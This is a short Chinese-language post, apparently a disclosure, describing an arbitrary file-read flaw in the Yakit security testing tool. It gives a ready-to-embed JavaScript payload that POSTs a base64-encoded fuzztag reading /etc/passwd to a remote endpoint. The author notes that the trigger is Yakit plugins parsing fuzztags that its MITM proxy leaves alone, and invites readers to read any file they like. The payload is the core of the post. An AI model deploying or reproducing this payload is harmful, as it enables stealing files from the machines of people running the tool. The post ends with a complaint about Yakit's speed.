杜绝废话，随便在页面上嵌入一个js，内容是：

<script>
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http://yakit.com/filesubmit");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(`file={{base64enc(file(/etc/passwd))}}`);
</script>

可自由发挥，读任意文件。

原因：yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析，但是经过插件时会被解析，所以这也是利用限制。

顺便吐槽：yakit跑起来卡卡的，啥时候能优化到和burp一样啊。